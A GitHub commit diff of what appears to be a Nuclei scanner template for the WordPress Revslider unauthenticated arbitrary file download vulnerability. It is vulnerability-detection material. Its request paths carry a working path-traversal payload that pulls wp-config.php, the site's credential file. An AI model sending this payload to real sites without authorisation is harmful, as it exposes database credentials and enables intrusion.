Update wp-revslider-file-download.yaml

patch-1
pussycat0x 2021-11-22 20:29:59 +05:30 committed by GitHub
parent ba3d453744
commit a8ee7e2ddf
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 1 deletions

View File

@ -1,4 +1,6 @@
id: wp-revslider-file-download
info:
name: Wordpress Revslider - Unauthenticated Arbitrary File Download
author: pussycat0x
@ -10,11 +12,15 @@ info:
- https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
- https://cxsecurity.com/issue/WLB-2021090129
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
- '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
matchers-condition: and
matchers:
- type: word
@ -25,4 +31,4 @@ requests:
condition: and
- type: status
status:
- 200
- 200